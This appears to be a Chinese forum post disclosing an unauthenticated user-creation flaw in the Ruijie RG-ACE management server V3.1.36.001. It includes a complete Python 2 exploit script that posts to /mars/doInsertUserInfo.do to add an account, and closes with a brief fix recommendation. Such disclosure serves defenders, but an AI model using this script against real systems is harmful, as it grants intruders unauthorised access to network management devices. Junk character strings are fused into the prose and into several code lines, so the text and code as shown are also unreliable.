锐捷应用控制引擎管理服务器可以增加用户

admin

锐捷应用控制引擎管理服务器（RG-ACE系列应用控制引擎管理服务器V3.1.36.001，官网的连接 http://www.ruijie.com.cn/service/down-search.aspx 显示是最新版）可以根据没有权限验证的接口直接增加用户，连接设备，查看设备信息和报表（权限相对于默认的admin比较低）

& E: q$ w( ~4 ]# C2 L
, n# a0 t: l9 q6 k# j测试的具体版本是
0 p+ ?6 Y) J2 P: Z' P产品名称: 锐捷应用控制引擎
版本号: 3.1.36.001 TC
* v& U6 m; j8 v  q2 j) d" i编译时间: 201104291730
- z! j  O9 s% [8 g6 S8 Y! H
' D  j0 }1 z* `
漏洞证明：
. o5 q% k! S- L9 G+ D$ P
8 [9 \8 r( q7 }- S1 O2 z; [

; N. |% w/ o1 `: G: i& y


4 U2 [6 h7 T% C+ g2 C6 Y2 p执行脚本
#! /usr/bin/env python
#coding=gbk
#RG-ACE管理服务器 V3.1.36.001
import urllib2, urllib,cookielib
3 R' h% A) s- P2 Y, J2 D& s  purl=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP
opener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))
opener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]
7 R2 ~* d$ J$ v& L! o' bpost=(("event","userManager.doInsertUserInfo"),
("useractionname","addButtonValue"),
+ b. g! K" b% a( Y4 T5 ~8 F("useropermanager","userManager"),
4 C' f+ h# Y, m6 Q4 a9 a1 Y) b("userName","t"), #######账号自己加
6 @2 N  N4 J* I: k("pwd","aaaaaa"),######密码自己加
' x( G5 J/ V# c, X+ `$ {("trueName","ad"),
0 h4 T6 T( w- \' @3 {("email",""),
4 d% S: d' @1 k. ?("mobilePhone",""),
("officePhone",""),
' P) q& ^3 |2 m$ f3 M" \("addr",""),
("submit","确定"))
urllib2.install_opener(opener)
) f; D- d, K  p4 Np=urllib2.urlopen(url, urllib.urlencode(post)).read()
print "Done"

3 ^) v8 Y8 u8 J; _7 _* \登录，连接设备
! @' Z) \" [9 p0 d" b5 H' ^7 \


2 E1 ?1 O/ ^& F  O/ m/ _
3 |& s* R5 [) L' i0 w+ d; x
' q1 B( V) R' P/ p- M3 k默认的管理员admin权限更大点


. Z) ]4 b. B/ @/ D1 y
- q" I; D( c' p
! t+ V3 H$ m! k4 X& Y0 l( l6 u' }. P+ ^7 A
修复方案：
加强对接口的权限验证
  P9 z* h1 L6 k$ j) |
  B4 b  x4 ?! O7 t0 j1 U